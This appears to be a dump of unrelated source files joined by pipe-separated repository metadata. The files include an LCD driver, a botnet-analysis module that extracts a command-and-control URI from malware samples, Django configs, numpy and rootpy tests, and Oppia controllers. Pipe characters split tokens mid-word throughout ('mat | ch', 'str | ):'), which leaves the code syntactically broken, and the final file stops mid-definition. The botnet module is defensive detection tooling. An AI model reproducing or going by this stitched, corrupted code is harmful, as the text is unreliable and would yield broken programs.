# Send bit7-4 firstly
buf = data & 0xF0
buf |= 0x05 # RS = 1, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
# Send bit3-0 secondly
buf = (data & 0x0F) << 4
buf |= 0x05 # RS = 1, RW = 0, EN = 1
write_word(LCD_ADDR ,buf)
time.sleep(0.002)
buf &= 0xFB # Make EN = 0
write_word(LCD_ADDR ,buf)
def init(addr, bl):
# global BUS
# BUS = smbus.SMBus(1)
global LCD_ADDR
global BLEN
LCD_ADDR = addr
BLEN = bl
try:
send_command(0x33) # Must initialize to 8-line mode at first
time.sleep(0.005)
send_command(0x32) # Then initialize to 4-line mode
time.sleep(0.005)
send_command(0x28) # 2 Lines & 5*7 dots
time.sleep(0.005)
send_command(0x0C) # Enable display without cursor
time.sleep(0.005)
send_command(0x01) # Clear Screen
BUS.write_byte(LCD_ADDR, 0x08)
except:
return False
else:
return True
def clear():
send_command(0x01) # Clear Screen
def openlight(): # Enable the backlight
BUS.write_byte(0x27,0x08)
BUS.close()
def write(x, y, str | ):
if x < 0:
x = 0
if x > 15:
x = 15
if y <0:
y = 0
if y > 1:
y = 1
# Move cursor
addr = 0x80 + 0x40 * y + x
send_command(addr)
for chr in str:
send_data(ord(chr))
if | __name__ == '__main__':
init(0x27, 1)
write(4, 0, 'Hello')
write(7, 1, 'world!')
|
bwall/bamfdetect | BAMF_Detect/modules/herpes.py | Python | mit | 1,507 | 0.001991 | from common import Modules, data_strings, load_yara_rules, PEParseModule, ModuleMetadata, is_ip_or_domain
from re import match
class herpes(PEParseModule):
def __init__(self):
md = ModuleMetadata(
module_name="herpes",
bot_name="Herpes Net",
description="Botnet that really makes your crotch itch",
authors=["Brian Wallace (@botnet_hunter)"],
version="1.0.0",
date="April 14, 2014",
references=[]
)
PEParseModule.__init__(self, md)
self.yara_rules = None
pass
def _generate_yara_rules(self):
if self.yara_rules is None:
self.yara_rules = load_yara_rules("herpes.yara")
return self.yara_rules
def get_bot_information(self, file_data):
results = {}
gate = None
server = None
for s in data_strings(file_data):
if s.find("run.php") != -1:
gate = s
if s.startswith("http://") and len(s) > len("http://"):
domain = s[7:]
if domain.find('/') != -1:
domain = domain[:domain.find('/')]
if is_ip_or_domain(domain):
| server = s
if mat | ch(r'^\d\.\d\.\d$', s) is not None:
results["version"] = s
if server is not None and gate is not None:
results["c2_uri"] = "%s%s" % (server, gate)
return results
Modules.list.append(herpes()) |
cydrobolt/lucem | lucem/urls.py | Python | apache-2.0 | 732 | 0.002732 | from django.conf.urls import url, include
from django.contrib.auth import views as auth_views
from django.contrib import admin
from app import views
from app import api_views
api_urlpatterns = [
url(r'^get_friends_light_states', api_views.json_friends_light_states, name='api_v1_get_friends_light_states'),
| url(r'^ping_friend_lights', api_views.ping_light, name='api_v1_ping_friend_lights'),
]
urlpatterns = [
# Views
url(r'^$', views.index, name='home'),
url(r'^logo | ut/$', views.logout, name='logout'),
# Admin and authentication
url('', include('social_django.urls', namespace='social')),
url(r'^admin/', admin.site.urls),
# API endpoints
url(r'^api/v1/', include(api_urlpatterns)),
]
|
vijayanandau/KnowledgeShare | makahiki/apps/widgets/AskedQuestions/urls.py | Python | mit | 216 | 0.009259 | "" | "Ask Admin URL."""
from django.conf.urls.defaults import url, patterns
urlpatterns = patterns('',
url(r'^my_question/$',
'apps.widgets.AskedQuestions.views.send_question', name="ask_que_question"),
| )
|
asterix135/whoshouldivotefor | explorer/migrations/0007_auto_20170626_0543.py | Python | mit | 1,175 | 0.000851 | # -*- coding: utf-8 -*-
# Generated by Django 1.11.2 on 2017-06-26 09:43
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('explorer', '0006_auto_20170626_0345'),
]
operations = [
migrations.RenameModel(
old_name='Politician',
new_name='Candidate',
),
migrations.RenameField(
model_name='election',
old_name='start_date',
new_name='campaign_start_date',
),
migrations.RenameField(
model_name='electioncandidate',
| old_name=' | politician',
new_name='candidate',
),
migrations.AlterField(
model_name='electioncandidate',
name='election',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='candidate_details', to='explorer.Election'),
),
migrations.AlterUniqueTogether(
name='electioncandidate',
unique_together=set([('candidate', 'election', 'district')]),
),
]
|
dmlc/tvm | python/tvm/topi/hexagon/conv2d.py | Python | apache-2.0 | 973 | 0 | # Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# dis | tributed with this work for additional information
# regarding copyright own | ership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
""" Schedules for conv2d. """
import tvm
def schedule_conv2d_nhwc(outs):
"""Schedule for Conv2d NHWC operator."""
s = tvm.te.create_schedule([x.op for x in outs])
return s
|
SebastianoF/LabelsManager | nilabels/agents/header_controller.py | Python | mit | 6,482 | 0.004937 | import nibabel as nib
import numpy as np
from nilabels.tools.aux_methods.utils_rotations import get_small_orthogonal_rotation
from nilabels.tools.aux_methods.utils_path import get_pfi_in_pfi_out, connect_path_tail_head
from nilabels.tools.aux_methods.utils_nib import modify_image_data_type, \
modify_affine_transformation, replace_translational_part
class HeaderController(object):
"""
Facade of the methods in tools. symmetrizer, for work with paths to images rather than
with data. Methods under LabelsManagerManipulate are taking in general
one or more input manipulate them according to some rule and save the
output in the output_data_folder or in the specified paths.
"""
def __init__(self, input_data_folder=None, output_data_folder=None):
self.p | fo_in = input_data_folder
self.pfo_out = output_data_folder
def modify_image_type(self, filename_in, filename_out, new_dtype, update_description=None, verbose=1):
"""
Change data type and optionally update the nifti field descriptor.
:param filename_in: path to filename input
:param filename_out: path to filename output
:param new_dtype: numpy data type compatible input
:param update_description: stri | ng with the new 'descrip' nifti header value.
:param verbose:
:return: image with new dtype and descriptor updated.
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
new_im = modify_image_data_type(im, new_dtype=new_dtype, update_descrip_field_header=update_description, verbose=verbose)
nib.save(new_im, pfi_out)
def modify_affine(self, filename_in, affine_in, filename_out, q_form=True, s_form=True,
multiplication_side='left'):
"""
Modify the affine transformation by substitution or by left or right multiplication
:param filename_in: path to filename input
:param affine_in: path to affine matrix input, or nd.array or .npy array
:param filename_out: path to filename output
:param q_form: affect the q_form (True)
:param s_form: affect the s_form (True)
:param multiplication_side: multiplication_side: can be lef, right, or replace.
:return: save new image with the updated affine transformation
NOTE: please see the documentation http://nipy.org/nibabel/nifti_images.html#choosing-image-affine for more on the
relationships between s_form affine, q_form affine and fall-back header affine.
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
if isinstance(affine_in, str):
if affine_in.endswith('.txt'):
aff = np.loadtxt(connect_path_tail_head(self.pfo_in, affine_in))
else:
aff = np.load(connect_path_tail_head(self.pfo_in, affine_in))
elif isinstance(affine_in, np.ndarray):
aff = affine_in
else:
raise IOError('parameter affine_in can be path to an affine matrix .txt or .npy or the numpy array'
'corresponding to the affine transformation.')
im = nib.load(pfi_in)
new_im = modify_affine_transformation(im, aff, q_form=q_form, s_form=s_form,
multiplication_side=multiplication_side)
nib.save(new_im, pfi_out)
def apply_small_rotation(self, filename_in, filename_out, angle=np.pi/6, principal_axis='pitch',
respect_to_centre=True):
"""
:param filename_in: path to filename input
:param filename_out: path to filename output
:param angle: rotation angle in radiants
:param principal_axis: 'yaw', 'pitch' or 'roll'
:param respect_to_centre: by default is True. If False, respect to the origin.
:return:
"""
if isinstance(angle, list):
assert isinstance(principal_axis, list)
assert len(principal_axis) == len(angle)
rot = np.identity(4)
for pa, an in zip(principal_axis, angle):
aff = get_small_orthogonal_rotation(theta=an, principal_axis=pa)
rot = rot.dot(aff)
else:
rot = get_small_orthogonal_rotation(theta=angle, principal_axis=principal_axis)
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
if respect_to_centre:
fov_centre = im.affine.dot(np.array(list(np.array(im.shape[:3]) / float(2)) + [1]))
transl = np.eye(4)
transl[:3, 3] = fov_centre[:3]
transl_inv = np.eye(4)
transl_inv[:3, 3] = -1 * fov_centre[:3]
rt = transl.dot(rot.dot(transl_inv))
new_aff = rt.dot(im.affine)
else:
new_aff = im.affine[:]
new_aff[:3, :3] = rot[:3, :3].dot(new_aff[:3, :3])
new_im = modify_affine_transformation(im_input=im, new_aff=new_aff, q_form=True, s_form=True,
multiplication_side='replace')
nib.save(new_im, pfi_out)
def modify_translational_part(self, filename_in, filename_out, new_translation):
"""
:param filename_in: path to filename input
:param filename_out: path to filename output
:param new_translation: translation that will replace the existing one.
:return:
"""
pfi_in, pfi_out = get_pfi_in_pfi_out(filename_in, filename_out, self.pfo_in, self.pfo_out)
im = nib.load(pfi_in)
if isinstance(new_translation, str):
if new_translation.endswith('.txt'):
tr = np.loadtxt(connect_path_tail_head(self.pfo_in, new_translation))
else:
tr = np.load(connect_path_tail_head(self.pfo_in, new_translation))
elif isinstance(new_translation, np.ndarray):
tr = new_translation
elif isinstance(new_translation, list):
tr = np.array(new_translation)
else:
raise IOError('parameter new_translation can be path to an affine matrix .txt or .npy or the numpy array'
'corresponding to the new intended translational part.')
new_im = replace_translational_part(im, tr)
nib.save(new_im, pfi_out)
|
aliceinit/todogen | todogen_utils/todo_generator.py | Python | gpl-3.0 | 690 | 0.005797 | __author__ = 'aliceinit'
import heapq
from todogen_utils.todogen_task import TodoTask
class TodoGenerator(object):
# todo add required place for tasks, set (optionally) places for free time period | s
# todo add weather requirements for tasks (optionally) - connect to weather APIs
def __init__(self, task_manager, schedule_manager):
self.task_manager = task_manager
self.schedule_manager = schedule_manager
self.task_heap = []
def prioritize(self):
self.task_heap = []
tasks = self.task_manager.get_all_tasks()
for task in tasks:
todo_task = TodoTask(task)
heapq.heappush(self.task_heap, | todo_task)
|
citrix-openstack-build/python-openstackclient | openstackclient/tests/common/test_clientmanager.py | Python | apache-2.0 | 1,180 | 0 | # Copyright 2012-2013 OpenStack, LLC.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
from openstackclient.common import clientmanager
from openstackclient.tests import utils
class Container(object):
attr = clientmanager.ClientCache(lambda x: object())
def __init__(self):
pass
class TestClientManager(utils.TestCase):
def setUp(self):
super(TestClientManager, self).setUp()
def test_singleton(self):
# NOTE(dtroyer): Verify that the ClientCache descriptor only invokes
# the factory | one time and always returns the same value after that.
c = Container()
self.assertEqu | al(c.attr, c.attr)
|
brolewis/oracle_of_kirk | oracle.py | Python | bsd-3-clause | 12,551 | 0.000159 | #!/usr/bin/env python2.7
# Standard Library
import argparse
import collections
import os
import re
import xml.etree.cElementTree
# Third Party
import imdb
import imdb.helpers
import mediawiki
import sqlalchemy
import sqlalchemy.ext.declarative
import sqlalchemy.ext.hybrid
import sqlalchemy.orm
CANON = {'"Star Trek" (1966)': 'TOS',
'"Star Trek: The Next Generation" (1987)': 'TNG',
'"Star Trek: Voyager" (1995)': 'VOY',
'"Star Trek: Enterprise" (2001)': 'ENT',
'"Star Trek" (1973)': 'TAS',
'"Star Trek: Deep Space Nine" (1993)': 'DS9',
'Star Trek: The Motion Picture (1979)': '',
'Star Trek II: The Wrath of Khan (1982)': '',
'Star Trek III: The Search for Spock (1984)': '',
'Star Trek IV: The Voyage Home (1986)': '',
'Star Trek V: The Final Frontier (1989)': '',
'Star Trek VI: The Undiscovered Country (1991)': '',
'Star Trek: Generations (1994)': '',
'Star Trek: First Contact (1996)': '',
'Star Trek: Insurrection (1998)': '',
'Star Trek: Nemesis (2002)': '',
'Star Trek (2009)': '',
'Star Trek Into Darkness (2013)': ''}
BASE = sqlalchemy.ext.declarative.declarative_base()
association_table = sqlalchemy.Table('character_appearance', BASE.metadata,
sqlalchemy.Column('character_id', sqlalchemy.Integer,
sqlalchemy.ForeignKey('character.id')),
sqlalchemy.Column('appearance_id', sqlalchemy.Integer,
sqlalchemy.ForeignKey('appearance.id'))
)
class Character(BASE):
__tablename__ = 'character'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
role_id = sqlalchemy.Column(sqlalchemy.String, unique=True)
name = sqlalchemy.Column(sqlalchemy.String)
article = sqlalchemy.orm.relationship('Article', uselist=False,
backref='character')
appearances = sqlalchemy.orm.relationship('Appearance',
secondary=association_table,
backref='characters')
def __repr__(self):
return self.name
class Appearance(BASE):
__tablename__ = 'appearance'
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
title = sqlalchemy.Column(sqlalchemy.String)
kind = sqlalchemy.Column(sqlalchemy.String)
article = sqlalchemy.orm.relationship('Article', uselist=False,
bac | kref='appearance')
def __repr__(self):
return self.title
class Article(BASE):
__tablename__ = 'article' |
id = sqlalchemy.Column(sqlalchemy.Integer, primary_key=True)
title = sqlalchemy.Column(sqlalchemy.String)
text = sqlalchemy.Column(sqlalchemy.String)
character_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('character.id'))
appearance_id = sqlalchemy.Column(sqlalchemy.Integer,
sqlalchemy.ForeignKey('appearance.id'))
def __repr__(self):
return self.title
@sqlalchemy.ext.hybrid.hybrid_property
def html(self):
return mediawiki.wiki2html(self.text or '', False)
class SixDegrees(object):
def __init__(self):
database_uri = os.getenv('DATABASE_URI', 'sqlite:///star_trek.sqlite')
engine = sqlalchemy.create_engine(database_uri)
BASE.metadata.create_all(engine)
self.session = sqlalchemy.orm.sessionmaker(bind=engine)()
self._role_names = None
def load_imdb(self):
access = imdb.IMDb()
self._role_names = collections.defaultdict(list)
for series in access.search_movie('Star Trek', results=30):
title = series['long imdb title']
kind = series['kind']
if title in CANON:
if kind == 'tv series':
title = CANON[title]
access.update(series, 'episodes')
for episode in imdb.helpers.sortedEpisodes(series):
access.update(episode)
self._parse_episode(episode, title, kind)
elif kind == 'movie':
appearance = self._get_appearance(title, kind)
movie = access.get_movie(series.movieID)
for actor in movie['cast']:
self._add_actor(actor, appearance)
self.session.add(appearance)
self.session.commit()
for role_id in self._role_names:
counter = collections.Counter(self._role_names[role_id])
query = self.session.query(Character)
character = query.filter_by(role_id=role_id).first()
character.name = counter.most_common(1)[0][0]
self.session.commit()
def _parse_episode(self, episode, series_title, series_kind):
episode_title = u'{} ({})'.format(episode['title'], series_title)
appearance = self._get_appearance(episode_title, series_kind)
for actor in episode['cast']:
self._add_actor(actor, appearance)
self.session.add(appearance)
self.session.commit()
def _add_actor(self, actor, appearance):
if isinstance(actor.currentRole, imdb.utils.RolesList):
for role in actor.currentRole:
character = self._add_character(role)
if character:
appearance.characters.append(character)
else:
character = self._add_character(actor.currentRole)
if character:
appearance.characters.append(character)
def _add_character(self, role):
generic = ('Enterprise Computer', 'Ensign', 'Starfleet Officer')
if role.get('name') and role.getID() and role['name'] not in generic:
self._role_names[role.getID()].append(role['name'])
query = self.session.query(Character)
character = query.filter_by(role_id=role.getID()).first()
if not character:
character = Character(role_id=role.getID(), name=role['name'])
self.session.add(character)
self.session.commit()
return character
def _get_appearance(self, title, kind):
query = self.session.query(Appearance)
appearance = query.filter_by(title=title).first()
if not appearance:
appearance = Appearance(title=title, kind=kind)
self.session.add(appearance)
return appearance
def load_ma(self):
name_pattern = re.compile(r'(?:\{.*\}){0,1}(.*)')
slug_pattern = re.compile(r'[\W_]+')
slugs = self.slugs
xml_dir = os.path.dirname(os.path.realpath(__file__))
xml_path = os.path.join(xml_dir, 'memory_alpha.xml')
events = ('start', 'end')
etree = xml.etree.cElementTree.iterparse(xml_path, events=events)
level = -1
for event, elem in etree:
name = name_pattern.search(elem.tag).groups()[0]
if event == 'start':
level += 1
if level == 2 and event == 'end' and name == 'title':
title = elem.text
if level == 3 and event == 'end' and name == 'text':
text = elem.text
if level == 1 and event == 'end':
if name == 'page':
slug = slug_pattern.sub('', title).lower()
if slug in slugs:
obj = slugs[slug]
article = Article(title=title, text=text)
if isinstance(obj, Appearance):
article.appearance = obj
else:
article.character = obj
self.session.add(article)
self.session.commit()
if event == 'end':
level -= 1
elem.clear()
@property
def slugs(self):
pattern = re.compile(r'[\W_]+')
slugs = {}
for appearance in self.session.query(Appearance).all():
slug = pattern.sub(u' |
kichkasch/ioids | g4ds/protocols/protocolinterface.py | Python | gpl-3.0 | 1,822 | 0.008233 | """
Provides the interface, each protocol implementation must implement to work with G4DS.
| Grid for Digital Security (G4DS)
@author: Michael Pilgermann
@contact: mailto:mpilgerm@glam.ac.uk
@license: GPL (General Public License)
"""
class ProtocolInterface:
"""
Provides a common interface for all implementations for protocols.
@ivar _name: Name of the Implementation
| @type _name: C{String}
"""
def __init__(self, name):
"""
Just ot set up the name of the implementation.
"""
self._name = name
def getName(self):
"""
GETTER
"""
return self._name
def listen(self, callback):
"""
The implementation should listen to a certain port here.
Parameters for address and the like are not required here since the implementations should load their
settings from the config module.
Any implementation must run its listener in its own thread, otherwise it
will block the entire application / library.
@param callback: Function to call whenever a new message arrives
@type callback: Function
@return: Indicates, whether the server was established sucessfully
@rtype: C{Boolean}
"""
return 0
def shutdown(self):
"""
The implementation should shut down the listener.
@return: Indicates, whether the shutdown was sucessful.
@rtype: C{Boolean}
"""
return 0
def sendMessage(self, endpoint, message):
"""
The implementation should send the message to the endpoint.
@return: Indicates, whether the message was send sucessfully
@rtype: C{Boolean}
"""
return 0
|
jjas0nn/solvem | tensorflow/lib/python2.7/site-packages/numpy/lib/tests/test_packbits.py | Python | mit | 3,214 | 0 | from __future__ import division, absolute_import, print_function
import numpy as np
from numpy.testing import assert_array_equal, assert_equal, assert_raises
def test_packbits():
# Copied from the docstring.
a = [[[1, 0, 1], [0, 1, 0]],
[[1, 1, 0], [0, 0, 1]]]
for dt in '?bBhHiIlLqQ':
arr = np.array(a, dtype=dt)
b = np.packbits(arr, axis=-1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[[160], [64]], [[192], [32]]]))
assert_raises(TypeError, np.packbits, np.array(a, dtype=float))
def test_packbits_empty():
shapes = [
(0,), (10, 20, 0), (10, 0, 20), (0, 10, 20), (20, 0, 0), (0, 20, 0),
(0, 0, 20), (0, 0, 0),
]
for dt in '?bBhHiIlLqQ':
for shape in shapes:
a = np.empty(shape, dtype=dt)
b = np.packbits(a)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, (0,))
def test_packbits_empty_with_axis():
# Original shapes and lists of packed shapes for different axes.
shapes = [
((0,), [(0,)]),
((10, 20, 0), [(2, 20, 0), (10, 3, 0), (10, 20, 0)]),
((10, 0, 20), [(2, 0, 20), (10, 0, 20), (10, 0, 3)]),
((0, 10, 20), [(0, 10, 20), (0, 2, 20), (0, 10, 3)]),
((20, 0, 0), [(3, 0, 0), (20, 0, 0), (20, 0, 0)]),
((0, 20, 0), [(0, 20, 0), (0, 3, 0), (0, 20, 0)]),
((0, 0, 20), [(0, 0, 20), (0, 0, 20), (0, 0, 3)]),
((0, 0, 0), [(0, 0, 0), (0, 0, 0), (0, 0, 0)]),
]
for dt in '?bBhHiIlLqQ':
for in_shape, out_shapes in shapes:
for ax, out_shape in enumerate(out_shapes):
a = np.empty(in_shape, dtype=dt)
b = np.packbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
def test_unpackbits():
# Copied from the docstring.
a = np.array([[2], [7], [23]], dtype=np.uint8)
b = np.unpackbits(a, axis=1)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.array([[0, 0, 0, 0, 0, 0, 1, 0],
[0, 0, 0, 0, 0, 1, 1, 1],
[0, 0, 0, 1, 0, 1, 1, 1]]))
def test_unpackbits_empty():
a = np.empty((0,), dtype=np.uint8)
b = np.unpackbits(a)
assert_equal(b.dtype, np.uint8)
assert_array_equal(b, np.empty((0,)))
def test_unpackbits_empty_with_axis():
# Lists of packed shapes for different axes and unpacked shapes.
shapes = [
([(0,)], (0,)),
([(2, 24, 0), (16, 3, 0), (16, 24, 0)], (16, 24, 0)),
([(2, 0, 24), (16, 0, 24), (16, 0, 3)], (16, 0, 24)),
([(0, 16, 24), (0, 2, 24), (0, 16, 3)], (0, 16, 24)),
([(3, 0, 0), (24, 0, 0), (24, 0, 0)], (24, 0, 0)),
([(0, 24, 0), (0, 3, 0), (0, 24, 0)], (0, 24, 0)),
([(0, 0, 24), (0, 0, 24), (0, 0, 3)], (0, 0, 24)),
([(0, 0, 0), | (0, 0, 0), (0, 0, 0)], (0, 0, 0)),
]
for in_shapes, out_shap | e in shapes:
for ax, in_shape in enumerate(in_shapes):
a = np.empty(in_shape, dtype=np.uint8)
b = np.unpackbits(a, axis=ax)
assert_equal(b.dtype, np.uint8)
assert_equal(b.shape, out_shape)
|
QuantCrimAtLeeds/PredictCode | tests/gui/predictors/sepp2_test.py | Python | artistic-2.0 | 2,313 | 0.017294 | from .helper import *
import open_cp.gui.predictors.sepp2 as sepp2
import open_cp.gui.predictors.predictor
#import datetime
@pytest.fixture
def analysis_model2(analysis_mod | el):
analysis_model.time_range = (datetime.datetime(2017,5,21,12,30),
datetime.datetime(2017,5,21,13,30), None, None)
return analysis_model
@mock.patch("open_cp.seppexp")
def test_SEPP(seppmock, model, project_task, analysis_model2, grid_task):
provider = sepp2.SEPP(model)
assert provider.name == "Grid based SEPP"
assert provider.settings_str | ing is None
standard_calls(provider, project_task, analysis_model2, grid_task)
def test_serialise(model, project_task, analysis_model2, grid_task):
serialise( sepp2.SEPP(model) )
def test_no_data(model, project_task, analysis_model, grid_task):
analysis_model.time_range = (datetime.datetime(2017,5,20,12,30),
datetime.datetime(2017,5,20,13,30), None, None)
provider = sepp2.SEPP(model)
with pytest.raises(open_cp.gui.predictors.predictor.PredictionError):
standard_calls(provider, project_task, analysis_model, grid_task)
@mock.patch("open_cp.seppexp")
def test_training_usage(seppmock, model, project_task, analysis_model2, grid_task):
provider = sepp2.SEPP(model)
subtask = standard_calls(provider, project_task, analysis_model2, grid_task)
seppmock.SEPPTrainer.assert_called_with(grid=grid_task.return_value)
trainer_mock = seppmock.SEPPTrainer.return_value
np.testing.assert_allclose(trainer_mock.data.xcoords, [0, 10])
np.testing.assert_allclose(trainer_mock.data.ycoords, [10, 20])
time_diffs = ( (trainer_mock.data.timestamps -
[np.datetime64("2017-05-21T12:30"), np.datetime64("2017-05-21T13:00")])
/ np.timedelta64(1,"ms") )
np.testing.assert_allclose(time_diffs, [0,0])
trainer_mock.train.assert_called_with(iterations=40, use_corrected=True)
pred = trainer_mock.train.return_value
np.testing.assert_allclose(pred.data.xcoords, [0, 10, 20])
np.testing.assert_allclose(pred.data.ycoords, [10, 20, 0])
train_date = datetime.datetime(2017,5,22,5,35)
prediction = subtask(train_date)
assert prediction == pred.predict.return_value
pred.predict.assert_called_with(train_date)
|
ndawe/rootpy | rootpy/tests/test_decorators.py | Python | bsd-3-clause | 2,286 | 0.001312 | from rootpy import ROOT
from rootpy.base import Object
from rootpy.decorators import (method_file_check, method_file_cd,
snake_case_methods)
from rootpy.io import TemporaryFile
import rootpy
from nose.tools import assert_equal, assert_true, raises
def test_snake_case_methods():
class A(object):
def SomeMethod(self): pass
def some_method(self): pass
def OtherMethod(self): pass
def Write(self): pass
def Cd(self): pass
def cd(self): pass
def LongMethodName(self): pass
@snake_case_methods
class B(A):
_ROOT = A
def write(self): pass
assert_true(hasattr(B, 'some_method'))
assert_true(hasattr(B, 'cd'))
assert_true(hasattr(B, 'long_method_name'))
assert_true(hasattr(B, 'write'))
assert_true(hasattr(B, 'other_method'))
def test_snake_case_methods_descriptor():
def f(_): pass
class A(object):
Prop = property(f)
Sm = staticmethod(f)
Cm = classmethod(f)
M = f
class B(A):
cm = A.__dict__["Cm"]
m = A.__dict__["M"]
prop = A.__dict__["Prop"]
sm = A.__dict__["Sm"]
@snake_case_methods
class snakeB(A):
_ROOT = A
# Ensure that no accidental descriptor dereferences happened inside
# `snake_case_methods`. This is checked by making sure that | the types
# are the same between B and snakeB.
for member in dir(snakeB):
if member.startswith("_"): continue
assert_equal(type(getattr(B, member)), type(getattr(snakeB, member)))
class Foo(Object, ROOT.R.TH1D):
@method_file_check
def something(self, foo):
self.file = ROOT.gDir | ectory
return foo
@method_file_cd
def write(self):
assert_true(self.GetDirectory() == ROOT.gDirectory)
def test_method_file_check_good():
foo = Foo()
with TemporaryFile():
foo.something(42)
#@raises(RuntimeError)
#def test_method_file_check_bad():
# foo = Foo()
# foo.something(42)
def test_method_file_cd():
file1 = TemporaryFile()
foo = Foo()
foo.SetDirectory(file1)
file2 = TemporaryFile()
foo.write()
file1.Close()
file2.Close()
if __name__ == "__main__":
import nose
nose.runmodule()
|
Eliel-Lopes/Python-URI | 1003.py | Python | mit | 75 | 0.026667 | A = int(in | put())
B = int(input())
SOMA = (A + B)
print("SOMA = % | d" %SOMA)
|
mattrobenolt/warehouse | tasks/__init__.py | Python | apache-2.0 | 673 | 0 | # Copyright 2013 Donald Stufft
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the | License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distr | ibuted on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import invoke
from . import release
from . import static
ns = invoke.Collection(release, static)
|
lecly/pymongo-driver | tests/data/for_purifier.py | Python | mit | 2,478 | 0.000404 | #!/usr/bin/env python
# vim: set fileencoding=utf-8 :
_str_field = 789
_int_field = '123'
_float_field = '123.45'
_bool_field = 'x'
_int_field_default_none = None
_tuple_int_field = ('12', '23')
_list_str_field = [78, 89]
def data_input():
source = {
'str_field': _str_field,
'int_field': _int_field,
'float_field': _float_field,
'bool_field': _bool_field,
'int_field_default_none': _int_field_default_none,
'tuple_int_field': _tuple_int_field,
'list_str_field': _list_ | str_field,
}
return _data_build(source)
def data_output():
source = {
'str_field': str(_str_field),
'int_field': int(_int_field),
'float_field': float(_float_field),
'bool_field': bool(_bool_field),
'int_field_default_none': None if _int_field_default_none is None else int(_int_field_default_none),
'tuple_int_field': list(int(i) fo | r i in _tuple_int_field),
'list_str_field': list(str(s) for s in _list_str_field),
}
return _data_build(source)
def _data_build(source):
str_field = source.get('str_field')
int_field = source.get('int_field')
float_field = source.get('float_field')
bool_field = source.get('bool_field')
int_field_default_none = source.get('int_field_default_none')
tuple_int_field = source.get('tuple_int_field')
list_str_field = source.get('list_str_field')
dict_field = {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
'bool_field': bool_field,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
}
dict_field_nesting = {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
'bool_field': bool_field,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
'dict_field': dict_field
}
return {
'str_field': str_field,
'int_field': int_field,
'float_field': float_field,
'bool_field': bool_field,
'int_field_default_none': int_field_default_none,
'tuple_int_field': tuple_int_field,
'list_str_field': list_str_field,
'dict_field': dict_field,
'dict_field_nesting': dict_field_nesting,
'list_dict_field': [dict_field, dict_field],
'list_dict_field_nesting': [dict_field_nesting, dict_field_nesting],
}
# vim:ts=4:sw=4
|
brianrodri/oppia | core/controllers/practice_sessions.py | Python | apache-2.0 | 3,351 | 0.000298 | # Copyright 2018 The Oppia Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS-IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Controllers for the practice sessions page."""
from __future__ import annotations
from core import feconf
from core.constants import constants
from core.controllers import acl_decorators
from core.controllers import base
from core.domain import skill_fetchers
from core.domain import topic_fetchers
class PracticeSessionsPage(base.BaseHandler):
"""Renders the practice sessions page."""
URL_PATH_ARGS_SCHEMAS = {
'classroom_url_fragment': constants.SCHEMA_FOR_CLASSROOM_URL_FRAGMENTS,
'topic_url_fragment': constants.SCHEMA_FOR_TOPIC_URL_FRAGMENTS
}
HANDLER_ARGS_SCHEMAS = {
'GET': {}
}
@acl_decorators.can_access_topic_viewer_page
def get(self, _):
"""Handles GET requests."""
self.render_template('practice-session-page.mainpage.html')
class PracticeSessionsPageDataHandler(base.BaseHandler):
"""Fetches relevant data for the practice sessions page."""
GET_HANDLER_ERROR_RETURN_TYPE = feconf.HANDLER_TYPE_JSON
URL_PATH_ARGS_SCHEMAS = {
'classroom_url_fragment': constants.SCHEMA_FOR_CLASSROOM_URL_FRAGMENTS,
'topic_url_fragment': constants.SCHEMA_FOR_TOPIC_URL_FRAGMENTS
}
HANDLER_ARGS_SCHEMAS = {
'GET': {
'selected_subtopic_ids': {
'schema': {
'type': 'custom',
'obj_type': 'JsonEncodedInString'
}
